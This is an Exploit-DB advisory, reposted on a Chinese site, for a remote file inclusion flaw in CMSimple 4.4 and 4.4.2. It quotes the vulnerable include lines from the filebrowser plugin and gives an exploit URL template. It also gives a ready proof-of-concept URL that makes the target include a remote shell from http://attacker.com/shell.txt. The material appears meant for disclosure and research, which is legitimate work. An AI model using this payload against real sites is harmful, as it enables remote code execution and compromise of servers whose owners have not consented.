CMSimple 4.4/4.4.2 – Remote File Inclusion - 体验盒子

作者： NoGe
日期： 2014-04-18
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/32930/
=============================================================================================================


[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

 Software : CMSimple - Open Source CMS with no database
 Version: 4.4, 4.4.2 and below
 Vendor : http://www.cmsimple.org
 Author : NoGe
 Contact: noge[dot]code[at]gmail[dot]com
 Blog : http://evilc0de.blogspot.com
 Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. 
All data are stored in a simple file system.


=============================================================================================================


[o] Vulnerable File

 plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';


=============================================================================================================


[o] Exploit

 http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]


=============================================================================================================


[o] PoC

 http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?


=============================================================================================================


[o] Greetz

 Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
 aJe kaka11 matthews wishnusakti inc0mp13te martfella
 pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


[o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)